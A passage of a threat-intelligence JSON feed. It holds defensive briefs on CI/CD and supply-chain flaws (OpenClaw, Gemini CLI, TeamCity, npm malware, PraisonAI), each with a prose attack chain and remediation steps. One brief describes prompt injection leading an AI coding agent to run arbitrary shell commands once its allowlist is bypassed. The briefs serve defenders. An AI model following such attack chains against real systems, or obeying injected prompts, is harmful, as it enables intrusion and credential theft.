settings.\u003c/li\u003e\n\u003cli\u003eThe attacker triggers an approved execution request within the OpenClaw environment.\u003c/li\u003e\n\u003cli\u003eDue to the incomplete sanitization, the attacker-controlled environment variables are used by the package manager.\u003c/li\u003e\n\u003cli\u003eThe package manager is redirected to the attacker\u0026rsquo;s infrastructure for package resolution or runtime bootstrap.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s infrastructure serves trojanized content disguised as legitimate packages or runtime components.\u003c/li\u003e\n\u003cli\u003eOpenClaw executes the trojanized content, granting the attacker initial access to the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-41387 can lead to the execution of arbitrary code within the OpenClaw environment. This can result in compromised systems, data breaches, or supply chain attacks. Due to the nature of package management redirection, the impact could extend beyond the initial target, affecting other systems relying on the compromised OpenClaw instance. The vulnerability has a CVSS v3.1 score of 7.8, indicating a high severity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade OpenClaw to version 2026.3.22 or later to remediate the vulnerability described in CVE-2026-41387.\u003c/li\u003e\n\u003cli\u003eImplement stricter input validation on environment variables used by OpenClaw, focusing on package manager settings, to prevent redirection attacks.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections to unusual or untrusted domains during package resolution or runtime bootstrap, as this may indicate an attempted redirection attack.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-29T12:00:00Z","date_published":"2026-04-29T12:00:00Z","id":"/briefs/2026-04-openclaw-env-vuln/","summary":"OpenClaw before 2026.3.22 is vulnerable to incomplete host environment variable sanitization, allowing attackers to redirect package resolution or runtime bootstrap to attacker-controlled infrastructure and execute trojanized content.","title":"OpenClaw Incomplete Host Environment Variable Sanitization Vulnerability (CVE-2026-41387)","url":"https://feed.craftedsignal.io/briefs/2026-04-openclaw-env-vuln/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Gemini CLI","run-gemini-cli GitHub Action"],"_cs_severities":["critical"],"_cs_tags":["rce","supply-chain","github-actions"],"_cs_type":"advisory","_cs_vendors":["Google"],"content_html":"\u003cp\u003eGemini CLI (\u003ccode\u003e@google/gemini-cli\u003c/code\u003e) versions prior to 0.39.1 and version 0.40.0-preview.2, along with the \u003ccode\u003erun-gemini-cli\u003c/code\u003e GitHub Action versions prior to 0.1.22, are susceptible to remote code execution due to insecure workspace trust handling and tool allowlisting bypasses. The vulnerability arises from the automatic trust of workspace folders in headless mode, allowing malicious environment variables within the \u003ccode\u003e.gemini/\u003c/code\u003e directory to be exploited. Furthermore, in \u003ccode\u003e--yolo\u003c/code\u003e mode, the tool allowlist was previously ignored, enabling prompt injection and code execution via commands like \u003ccode\u003erun_shell_command\u003c/code\u003e. This poses a risk, especially in CI/CD environments that process untrusted inputs such as pull requests. The patched version 0.39.1 enforces explicit folder trust in headless mode and properly evaluates tool allowlists under \u003ccode\u003e--yolo\u003c/code\u003e, mitigating these risks. This impacts all Gemini CLI GitHub Actions and requires users to review their workflows.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker submits a malicious pull request to a repository using Gemini CLI in a GitHub Actions workflow.\u003c/li\u003e\n\u003cli\u003eThe workflow, running in headless mode, automatically trusts the workspace folder (versions prior to 0.39.1).\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s pull request includes a crafted \u003ccode\u003e.gemini/\u003c/code\u003e directory containing malicious environment variables.\u003c/li\u003e\n\u003cli\u003eGemini CLI loads the malicious environment variables, leading to code execution.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker injects a malicious prompt leveraging \u003ccode\u003erun_shell_command\u003c/code\u003e when \u003ccode\u003e--yolo\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003erun_shell_command\u003c/code\u003e executes arbitrary commands on the runner due to the bypassed tool allowlist (versions prior to 0.39.1).\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the CI/CD runner, potentially exfiltrating secrets or injecting malicious code into the deployment pipeline.\u003c/li\u003e\n\u003cli\u003eSuccessful exploitation leads to code execution on the CI/CD runner, data exfiltration, or supply chain compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability impacts workflows utilizing Gemini CLI in headless mode, particularly those processing untrusted inputs such as pull requests from external contributors. Successful exploitation can lead to remote code execution on the CI/CD runner, potentially enabling attackers to exfiltrate sensitive information, such as API keys and credentials, or inject malicious code into the application deployment pipeline. This can lead to a supply chain compromise. All Gemini CLI GitHub Actions are affected, requiring users to review and update their workflows.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade \u003ccode\u003e@google/gemini-cli\u003c/code\u003e to version 0.39.1 or later, or 0.40.0-preview.3 if using a preview version.\u003c/li\u003e\n\u003cli\u003eUpgrade \u003ccode\u003eactions/google-github-actions/run-gemini-cli\u003c/code\u003e to version 0.1.22 or later.\u003c/li\u003e\n\u003cli\u003eFor workflows running on trusted inputs, set \u003ccode\u003eGEMINI_TRUST_WORKSPACE: 'true'\u003c/code\u003e in the GitHub Actions workflow.\u003c/li\u003e\n\u003cli\u003eFor workflows processing untrusted inputs, review the hardening guidance in \u003ca href=\"https://github.com/google-github-actions/run-gemini-cli\"\u003egoogle-github-actions/run-gemini-cli\u003c/a\u003e and set the environment variable accordingly.\u003c/li\u003e\n\u003cli\u003eReview and harden tool allowlists in \u003ccode\u003e~/.gemini/settings.json\u003c/code\u003e to restrict the commands that can be executed, especially when using the \u003ccode\u003e--yolo\u003c/code\u003e flag.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-24T19:30:01Z","date_published":"2026-04-24T19:30:01Z","id":"/briefs/2026-04-gemini-cli-rce/","summary":"Gemini CLI is vulnerable to remote code execution via workspace trust and tool allowlisting bypasses, impacting headless mode and GitHub Actions workflows.","title":"Gemini CLI Remote Code Execution via Workspace Trust and Tool Allowlisting Bypasses","url":"https://feed.craftedsignal.io/briefs/2026-04-gemini-cli-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["npm packages"],"_cs_severities":["high"],"_cs_tags":["supply-chain","malware","npm"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe CanisterSprawl campaign, first disclosed in April 2026, is a self-propagating malware targeting npm packages. This campaign focuses on stealing sensitive information, such as API keys, authentication tokens, and crypto wallet data from developer environments. The malware attempts to automate the process of publishing malicious packages to the npm registry using compromised developer accounts. By hijacking trusted credentials, CanisterSprawl seeks to extend its reach within the open-source ecosystem, turning a single compromised machine into a potential source of widespread supply chain attacks. This campaign highlights the need for robust security measures to prevent the installation of malicious packages and detect unauthorized activity within developer environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer installs a malicious npm package from the npm registry.\u003c/li\u003e\n\u003cli\u003eDuring installation, the package executes embedded code automatically.\u003c/li\u003e\n\u003cli\u003eThe malware scans environment variables on the local system, looking for credentials and developer tokens.\u003c/li\u003e\n\u003cli\u003eThe malware harvests browser credentials, crypto wallet data, and configuration files containing credentials.\u003c/li\u003e\n\u003cli\u003eThe collected data is exfiltrated to an external server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe malware attempts to locate an npm automation token on the infected machine.\u003c/li\u003e\n\u003cli\u003eIf a token is found, the malware lists all packages to which the token grants \u0026ldquo;write\u0026rdquo; access.\u003c/li\u003e\n\u003cli\u003eThe malware downloads the packages, injects the malicious script into them, and republishes them to the npm registry, spreading the infection to other projects.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful CanisterSprawl infections can lead to the exfiltration of sensitive data, including API keys, authentication tokens, and credentials, which can be used to gain unauthorized access to internal systems and services. The malware\u0026rsquo;s self-propagating nature allows it to spread through the npm ecosystem, potentially compromising numerous projects and developer accounts. If successful, attackers can inject malicious code into trusted packages, leading to supply chain attacks that affect a large number of downstream consumers. This can damage the reputation of affected developers and organizations, and result in significant financial losses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove any identified malicious packages immediately to prevent further data theft and propagation.\u003c/li\u003e\n\u003cli\u003eRotate potentially compromised credentials, tokens, and API keys that may have been exposed from affected hosts.\u003c/li\u003e\n\u003cli\u003eReview environment variables and local credentials on developer machines for potential compromise.\u003c/li\u003e\n\u003cli\u003eAudit account activity for unauthorized publishing or access to the npm registry, as highlighted in the Overview section.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect suspicious processes attempting to access sensitive files related to credentials.\u003c/li\u003e\n\u003cli\u003eEnable file integrity monitoring for common credential storage locations and configuration files to detect unauthorized access and modifications.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-23T16:18:33Z","date_published":"2026-04-23T16:18:33Z","id":"/briefs/2026-04-canistersprawl-npm-malware/","summary":"The CanisterSprawl malware campaign targets npm packages, using a self-propagating approach to steal sensitive data from developer machines, including tokens and API keys, and attempting to publish malicious packages using hijacked credentials.","title":"CanisterSprawl: Self-Propagating npm Malware Campaign","url":"https://feed.craftedsignal.io/briefs/2026-04-canistersprawl-npm-malware/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2024-27198"},{"cvss":7.3,"id":"CVE-2024-27199"}],"_cs_exploited":true,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["teamcity","vulnerability","authentication bypass","path traversal","supply-chain"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eJetBrains TeamCity, a CI/CD software platform, is vulnerable to CVE-2024-27198, an authentication bypass, and CVE-2024-27199, a path traversal vulnerability. These flaws affect TeamCity versions prior to 2023.11.4. Initially, there was no observed active exploitation. However, by March 7, 2024, widespread exploitation was detected following the public availability of proof-of-concept code. Attackers are actively exploiting these vulnerabilities to create new user accounts on publicly exposed, unpatched TeamCity instances. A substantial number of compromised servers are utilized as production machines for software building and deployment. These attacks have the potential to lead to supply-chain compromises by exposing sensitive information. CISA added CVE-2024-27199 to its Known Exploited Vulnerabilities catalog on April 20, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to a vulnerable TeamCity server, exploiting CVE-2024-27198 to bypass authentication.\u003c/li\u003e\n\u003cli\u003eOnce authenticated (or bypassing authentication), the attacker leverages CVE-2024-27199, a path traversal vulnerability, to access sensitive files and directories on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker reads configuration files containing credentials for other systems and services.\u003c/li\u003e\n\u003cli\u003eThe attacker creates new administrative user accounts on the TeamCity server to ensure persistent access.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies build configurations to inject malicious code into software builds.\u003c/li\u003e\n\u003cli\u003eThe attacker compromises the software supply chain by injecting malicious code into build artifacts.\u003c/li\u003e\n\u003cli\u003eThe attacker uses stolen credentials to access deployment environments and deploy compromised builds.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to perform administrative actions on affected TeamCity servers, leading to a compromise of confidentiality, integrity, and availability of data and infrastructure. The compromise of TeamCity servers used for software building and deployment can result in supply-chain attacks, as these servers often contain sensitive information, such as credentials for deployment environments. A substantial portion of compromised TeamCity servers are utilized as production machines for software building and deployment processes, increasing the scope and impact of potential supply chain attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately patch all JetBrains TeamCity servers to version 2023.11.4 or later to remediate CVE-2024-27198 and CVE-2024-27199 (Reference: \u003ca href=\"https://www.jetbrains.com/privacy-security/issues-fixed/)\"\u003ehttps://www.jetbrains.com/privacy-security/issues-fixed/)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect TeamCity Authentication Bypass Attempt\u0026rdquo; to your SIEM to detect exploitation attempts of CVE-2024-27198.\u003c/li\u003e\n\u003cli\u003eEnable web server logging and increase monitoring to detect suspicious activity related to path traversal attempts indicative of CVE-2024-27199 exploitation.\u003c/li\u003e\n\u003cli\u003eMonitor for the creation of new user accounts within TeamCity, especially administrative accounts, which could indicate successful exploitation.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-22T10:00:00Z","date_published":"2026-04-22T10:00:00Z","id":"/briefs/2026-04-jetbrains-teamcity-vulns/","summary":"Unpatched JetBrains TeamCity servers are being actively exploited via an authentication bypass (CVE-2024-27198) and path traversal vulnerability (CVE-2024-27199), allowing attackers to perform administrative actions and potentially conduct supply-chain attacks.","title":"JetBrains TeamCity Authentication Bypass and Path Traversal Vulnerabilities","url":"https://feed.craftedsignal.io/briefs/2026-04-jetbrains-teamcity-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","malware","notepad++"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Notepad++ updater, \u003ccode\u003egup.exe\u003c/code\u003e, is a component designed to automatically update the Notepad++ application. However, attackers can potentially exploit this updater to deliver malware or place unwarranted files on a system. This activity often begins with a compromised update server or a man-in-the-middle attack. Successful exploitation can lead to the installation of backdoors, credential access, and collection of sensitive information. The references provided highlight historical incidents involving the Notepad++ updater being abused in supply chain attacks. Defenders should monitor file creation events by \u003ccode\u003egup.exe\u003c/code\u003e outside of expected program directories and temporary update locations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe user installs Notepad++ on their Windows system.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003egup.exe\u003c/code\u003e updater component, located within the Notepad++ installation directory, is executed to check for updates.\u003c/li\u003e\n\u003cli\u003eThe updater connects to the Notepad++ update server to retrieve update information.\u003c/li\u003e\n\u003cli\u003eAn attacker compromises the update server or performs a man-in-the-middle attack.\u003c/li\u003e\n\u003cli\u003eThe compromised update server provides malicious instructions to \u003ccode\u003egup.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egup.exe\u003c/code\u003e creates a malicious executable or script in an unexpected location, such as the user\u0026rsquo;s temporary directory outside of normal update procedures.\u003c/li\u003e\n\u003cli\u003eThe malicious file is executed, leading to further compromise such as installing a backdoor or stealing credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the system and can perform collection and credential access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack exploiting the Notepad++ updater can lead to the installation of malware, such as backdoors, allowing attackers to gain persistent access to the compromised system. This can lead to data theft, credential compromise, and further lateral movement within the network. The number of potential victims depends on the scope of the compromised update server or the success of the man-in-the-middle attack. Historically, supply chain attacks targeting widely used software have impacted thousands of users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Notepad++ Updater (gup.exe) Creates Uncommon Files\u0026rdquo; to your SIEM and tune for your environment. This rule detects file creation events by \u003ccode\u003egup.exe\u003c/code\u003e in suspicious locations (see rule configuration).\u003c/li\u003e\n\u003cli\u003eMonitor \u003ccode\u003efile_event\u003c/code\u003e logs for unusual file creation events initiated by \u003ccode\u003egup.exe\u003c/code\u003e using the specified \u003ccode\u003elogsource\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect and prevent man-in-the-middle attacks against the Notepad++ update server.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T10:34:51Z","date_published":"2026-04-21T10:34:51Z","id":"/briefs/2026-06-notepadpp-updater-file-creation/","summary":"The Notepad++ updater (gup.exe) creating files in suspicious locations can indicate potential exploitation for malware delivery or unwarranted file placement, potentially leading to credential access and collection.","title":"Notepad++ Updater (gup.exe) Creates Uncommon Files","url":"https://feed.craftedsignal.io/briefs/2026-06-notepadpp-updater-file-creation/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.4,"id":"CVE-2026-24884"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["npm","supply-chain","symlink","directory-traversal","privilege-escalation","arbitrary-file-overwrite"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u003ccode\u003ecompressing\u003c/code\u003e npm package (v2.1.0 and earlier) contains a critical vulnerability that permits arbitrary file overwrites due to a symlink path traversal bypass. This bypass affects the patch for CVE-2026-24884. The vulnerability arises from an incomplete validation in the \u003ccode\u003eisPathWithinParent\u003c/code\u003e utility, where path string checks are performed without verifying the filesystem state, specifically symbolic links. By cloning a malicious repository containing a pre-existing symbolic link, a victim unknowingly plants a \u0026ldquo;poisoned path\u0026rdquo; on their system. The attacker can then craft a malicious archive that, when extracted by the vulnerable library, follows the symlink and overwrites arbitrary files. The ease of exploitation via \u003ccode\u003egit clone\u003c/code\u003e makes this vulnerability particularly dangerous.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker creates a malicious Git repository containing a symbolic link (e.g., \u003ccode\u003econfig_file\u003c/code\u003e) pointing to a sensitive target file or directory (e.g., \u003ccode\u003e/tmp/fake_root/etc/passwd\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eAttacker generates a malicious payload (e.g., \u003ccode\u003epayload.tar\u003c/code\u003e) containing a file with the same name as the symbolic link (e.g., \u003ccode\u003econfig_file\u003c/code\u003e) and uploads both to their Git repository.\u003c/li\u003e\n\u003cli\u003eVictim clones the attacker\u0026rsquo;s Git repository using \u003ccode\u003egit clone\u003c/code\u003e. This action automatically restores the symbolic link on the victim\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eVictim runs an application that utilizes the vulnerable \u003ccode\u003ecompressing\u003c/code\u003e library to extract the \u003ccode\u003epayload.tar\u003c/code\u003e archive.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecompressing\u003c/code\u003e library\u0026rsquo;s \u003ccode\u003eisPathWithinParent\u003c/code\u003e function resolves the path to the file being extracted. Due to lack of \u003ccode\u003elstat\u003c/code\u003e checks, the symbolic link is not detected.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efs.writeFile\u003c/code\u003e function follows the symlink, writing the contents of the file from \u003ccode\u003epayload.tar\u003c/code\u003e to the targeted sensitive file (e.g., \u003ccode\u003e/tmp/fake_root/etc/passwd\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eArbitrary file overwrite occurs, potentially leading to privilege escalation or code execution.\u003c/li\u003e\n\u003cli\u003eAttacker achieves persistent access or control by overwriting critical system files.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to overwrite arbitrary files on the victim\u0026rsquo;s system, potentially leading to privilege escalation by modifying sensitive system files such as \u003ccode\u003e/etc/passwd\u003c/code\u003e. Remote Code Execution (RCE) can be achieved by overwriting executable binaries or startup scripts. Data corruption can also occur through the modification of application data or database files. This vulnerability impacts developers and organizations using the \u003ccode\u003ecompressing\u003c/code\u003e library up to version v2.1.0 when extracting untrusted archives.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the \u003ccode\u003ecompressing\u003c/code\u003e npm package to a patched version that includes proper symlink handling. This is the primary remediation.\u003c/li\u003e\n\u003cli\u003eInspect Git repositories for suspicious symbolic links before cloning. Use \u003ccode\u003egit ls-tree -r \u0026lt;commit-ish\u0026gt; | grep 120000\u003c/code\u003e to search for symlinks in a repository.\u003c/li\u003e\n\u003cli\u003eImplement runtime monitoring for file writes to unexpected locations based on the \u003ccode\u003ecompressing\u003c/code\u003e library\u0026rsquo;s activity. Create a detection rule based on \u003ccode\u003eprocess_creation\u003c/code\u003e and \u003ccode\u003efile_event\u003c/code\u003e to detect writes to sensitive directories such as \u003ccode\u003e/etc\u003c/code\u003e by processes spawned by Node.js that also load the vulnerable \u003ccode\u003ecompressing\u003c/code\u003e module.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from processes related to the \u003ccode\u003ecompressing\u003c/code\u003e library after file extraction. Create a Sigma rule based on \u003ccode\u003enetwork_connection\u003c/code\u003e and \u003ccode\u003eprocess_creation\u003c/code\u003e to detect unusual outbound connections after archive extraction.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-18T12:00:00Z","date_published":"2026-04-18T12:00:00Z","id":"/briefs/2026-04-compressing-symlink-bypass/","summary":"A vulnerability in the `compressing` npm package (\u003c=v2.1.0) allows for arbitrary file overwrite via symlink path traversal, bypassing a previous patch for CVE-2026-24884.","title":"compressing npm Package Symlink Bypass Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-compressing-symlink-bypass/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.1,"id":"CVE-2026-40313"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["credential-leakage","supply-chain","github-actions","cve-2026-40313"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePraisonAI, a multi-agent teams system, faces a critical vulnerability (CVE-2026-40313) in versions 4.5.139 and below. The vulnerability stems from the ArtiPACKED attack vector within GitHub Actions workflows. Specifically, the use of actions/checkout without setting \u003ccode\u003epersist-credentials: false\u003c/code\u003e causes the GITHUB_TOKEN to be written to the \u003ccode\u003e.git/config\u003c/code\u003e file. When subsequent workflow steps upload artifacts (build outputs, logs, test results, etc.), these tokens can be inadvertently included. Given that PraisonAI is a public repository, any user with read access can download these artifacts and extract the leaked tokens. Successful exploitation allows attackers to push malicious code, poison releases and PyPI/Docker packages, steal repository secrets, and ultimately compromise the entire supply chain, affecting all downstream users. The issue is present across multiple workflow and action files within the \u003ccode\u003e.github/workflows/\u003c/code\u003e and \u003ccode\u003e.github/actions/\u003c/code\u003e directories. Version 4.5.140 addresses and resolves this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains read access to the public PraisonAI GitHub repository.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a GitHub Actions workflow that uploads artifacts.\u003c/li\u003e\n\u003cli\u003eThe workflow uses \u003ccode\u003eactions/checkout\u003c/code\u003e without \u003ccode\u003epersist-credentials: false\u003c/code\u003e, causing the GITHUB_TOKEN to be written to \u003ccode\u003e.git/config\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe workflow uploads an artifact (e.g., build output, logs, test results) that includes the \u003ccode\u003e.git/config\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eAttacker downloads the artifact.\u003c/li\u003e\n\u003cli\u003eAttacker extracts the GITHUB_TOKEN from the \u003ccode\u003e.git/config\u003c/code\u003e file within the artifact.\u003c/li\u003e\n\u003cli\u003eAttacker uses the leaked GITHUB_TOKEN to authenticate to the PraisonAI repository.\u003c/li\u003e\n\u003cli\u003eAttacker leverages the compromised GITHUB_TOKEN to inject malicious code, poison releases/packages, steal secrets, or perform other malicious activities, leading to a supply chain compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-40313 in PraisonAI versions 4.5.139 and below can result in a severe supply chain compromise. Attackers can inject malicious code into the PraisonAI repository, poison releases and associated packages (PyPI, Docker), and steal sensitive repository secrets. This can lead to widespread distribution of malware to downstream users of PraisonAI, compromising their systems and data. The vulnerability affects any user relying on PraisonAI and its distributed components.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade PraisonAI to version 4.5.140 or later to patch CVE-2026-40313.\u003c/li\u003e\n\u003cli\u003eAudit all GitHub Actions workflows in your organization to ensure that \u003ccode\u003eactions/checkout\u003c/code\u003e is used with \u003ccode\u003epersist-credentials: false\u003c/code\u003e to prevent credential leakage.\u003c/li\u003e\n\u003cli\u003eMonitor public repositories for inadvertently exposed configuration files containing credentials, and rotate potentially compromised tokens immediately.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect GitHub Workflow Artifact Containing Git Config\u0026rdquo; to identify leaked git configurations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T04:17:13Z","date_published":"2026-04-14T04:17:13Z","id":"/briefs/2026-04-praisonai-artifact-leakage/","summary":"PraisonAI versions 4.5.139 and below are vulnerable to credential leakage due to the ArtiPACKED attack, where GitHub Actions workflows using actions/checkout without persist-credentials: false write the GITHUB_TOKEN into the .git/config file, leading to potential exposure in uploaded artifacts and subsequent supply chain compromise.","title":"PraisonAI GitHub Actions Credential Leakage Vulnerability (CVE-2026-40313)","url":"https://feed.craftedsignal.io/briefs/2026-04-praisonai-artifact-leakage/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","initial-access","package-manager","elastic-defend","post-install"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis detection rule identifies Elastic Defend alerts triggered by processes with a package manager installation context in their ancestry. This includes package managers such as npm (Node.js), PyPI (pip / Python / uv), and cargo (Rust). The rule is designed to detect supply chain attacks and post-install abuse, where malicious scripts are executed during or after package installation. The rule leverages Elastic Defend alerts to identify suspicious activity within the process tree of package manager installations. This is crucial for defenders because install-time spawn chains are a common attack vector for injecting malicious code into systems. The rule is implemented as an ESQL query and is intended to be used with Elastic Stack version 9.3.0 or later.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer or system administrator initiates a package installation using a package manager like npm, pip, or cargo.\u003c/li\u003e\n\u003cli\u003eThe package manager downloads and installs the requested package and its dependencies.\u003c/li\u003e\n\u003cli\u003eThe installed package contains malicious code embedded within a post-install script or a dependency.\u003c/li\u003e\n\u003cli\u003eThe package manager executes the malicious post-install script (e.g., using \u003ccode\u003enode\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, or \u003ccode\u003ecargo\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe malicious script executes arbitrary commands, such as downloading and executing a payload from a remote server.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload establishes persistence on the system, potentially through scheduled tasks or registry keys.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the system and begins lateral movement and privilege escalation.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration, ransomware deployment, or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to complete system compromise, data breaches, and supply chain contamination. The compromised system could be used to spread malware to other systems within the network or to external customers through poisoned software packages. The severity is critical due to the potential for widespread impact and the difficulty in detecting and mitigating supply chain attacks. The financial and reputational damage to the organization could be substantial.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the following Sigma rules to your SIEM to detect malicious activity related to package manager installations.\u003c/li\u003e\n\u003cli\u003eReview and tune the Sigma rules for your specific environment to reduce false positives.\u003c/li\u003e\n\u003cli\u003eImplement strict code review and dependency management practices to prevent the introduction of malicious packages.\u003c/li\u003e\n\u003cli\u003eMonitor Elastic Defend alerts for suspicious activity in the process tree of package manager installations, as surfaced by this detection rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts related to package manager install ancestry to identify and remediate potential supply chain attacks.\u003c/li\u003e\n\u003cli\u003eEnable process monitoring with command-line logging to capture the full context of package manager installations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-package-manager-ancestry/","summary":"This rule detects Elastic Defend alerts where the alerted process has a package-manager install context in its ancestry (npm, PyPI, Rust), indicating potential supply chain compromise via malicious postinstall scripts.","title":"Elastic Defend Alert from Package Manager Install Ancestry","url":"https://feed.craftedsignal.io/briefs/2026-04-package-manager-ancestry/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.3,"id":"CVE-2026-40154"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-40154","template-injection","supply-chain"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePraisonAI, a multi-agent teams system, is susceptible to a critical vulnerability (CVE-2026-40154) affecting versions prior to 4.5.128. The application\u0026rsquo;s design flaw involves treating remotely fetched template files as trusted executable code. This occurs without performing necessary security checks such as integrity verification, origin validation, or user confirmation. This lack of 